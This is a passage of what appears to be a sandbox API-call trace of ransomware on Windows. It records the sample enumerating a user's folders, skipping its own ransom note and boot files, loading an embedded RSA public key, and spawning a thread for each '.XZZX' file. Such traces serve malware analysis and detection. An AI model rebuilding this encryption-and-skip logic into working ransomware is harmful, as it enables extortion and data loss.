9vtnbjukze\\9y_m-ovb2iyyx\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc60 [0189.157] CloseHandle (hObject=0xc60) returned 1 [0189.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0189.157] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0189.157] lstrcpyW (in: lpString1=0x17a5a4, lpString2="9Y_m-oVB2IyYX" | out: lpString1="9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0189.157] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0189.157] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0189.157] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.157] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0189.158] lstrcmpW (lpString1="DqOPM", lpString2="..") returned 1 [0189.158] lstrcmpW (lpString1="DqOPM", lpString2=".") returned 1 [0189.158] lstrcpyW (in: lpString1=0x17b430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0189.158] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0189.158] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpString2="DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0189.158] SetErrorMode (uMode=0x1) returned 0x1 [0189.158] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0189.158] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.158] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.158] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*" [0189.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cde9d8 [0189.159] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="DqOPM" [0189.159] lstrcpyW (in: lpString1=0x179504, lpString2="DqOPM" | out: lpString1="DqOPM") returned="DqOPM" [0189.159] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0189.159] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0189.159] lstrcmpW (lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX", lpString2="..") returned 1 [0189.159] lstrcmpW (lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX", lpString2=".") returned 1 [0189.159] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0189.159] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="ntldr") returned 0x0 [0189.159] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="NTLDR") returned 0x0 [0189.159] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0189.159] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0189.159] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0189.159] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") [0189.159] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.159] lstrcpyW (in: lpString1=0x179d3c, lpString2="04BBA0D020119813F8F6E49024327C5B.XZZX" | out: lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX") returned="04BBA0D020119813F8F6E49024327C5B.XZZX" [0189.160] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc68 [0189.160] Sleep (dwMilliseconds=0x96) [0189.311] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0189.311] lstrcmpW (lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpString2="..") returned 1 [0189.311] lstrcmpW (lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpString2=".") returned 1 [0189.311] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0189.311] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="ntldr") returned 0x0 [0189.311] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="NTLDR") returned 0x0 [0189.312] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0189.312] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="ntdetect.com") returned 0x0 [0189.312] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0189.312] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") [0189.312] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.312] lstrcpyW (in: lpString1=0x179d3c, lpString2="3006C810075ED0F01F3DE7C50B7FB538.XZZX" | out: lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned="3006C810075ED0F01F3DE7C50B7FB538.XZZX" [0189.312] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.312] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc6c [0189.312] Sleep (dwMilliseconds=0x96) [0189.467] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0189.467] lstrcmpW (lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpString2="..") returned 1 [0189.467] lstrcmpW (lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpString2=".") returned 1 [0189.468] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0189.468] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="ntldr") returned 0x0 [0189.468] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="NTLDR") returned 0x0 [0189.468] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0189.468] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="ntdetect.com") returned 0x0 [0189.468] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0189.468] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") [0189.468] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.468] lstrcpyW (in: lpString1=0x179d3c, lpString2="8F1540B007AB3EF89A8099C80BCC2340.XZZX" | out: lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned="8F1540B007AB3EF89A8099C80BCC2340.XZZX" [0189.468] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc70 [0189.469] Sleep (dwMilliseconds=0x96) [0189.623] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0189.623] lstrcmpW (lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpString2="..") returned 1 [0189.623] lstrcmpW (lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpString2=".") returned 1 [0189.623] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0189.623] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="ntldr") returned 0x0 [0189.624] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="NTLDR") returned 0x0 [0189.624] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0189.624] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0189.624] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0189.624] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") [0189.624] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.624] lstrcpyW (in: lpString1=0x179d3c, lpString2="B02B14800A31A4C0C9DC8D360E528908.XZZX" | out: lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX") returned="B02B14800A31A4C0C9DC8D360E528908.XZZX" [0189.624] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.624] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc74 [0189.624] Sleep (dwMilliseconds=0x96) [0189.780] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0189.780] lstrcmpW (lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpString2="..") returned 1 [0189.780] lstrcmpW (lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpString2=".") returned 1 [0189.780] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0189.780] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="ntldr") returned 0x0 [0189.780] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="NTLDR") returned 0x0 [0189.780] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0189.780] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0189.780] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0189.780] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") [0189.780] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.780] lstrcpyW (in: lpString1=0x179d3c, lpString2="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" | out: lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" [0189.780] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc78 [0189.781] Sleep (dwMilliseconds=0x96) [0189.935] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0189.935] lstrcmpW (lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpString2="..") returned 1 [0189.935] lstrcmpW (lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpString2=".") returned 1 [0189.935] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0189.936] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="ntldr") returned 0x0 [0189.936] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="NTLDR") returned 0x0 [0189.936] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0189.936] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0189.936] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0189.936] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") [0189.936] lstrcpyA (in: lpString1=0x17973c, 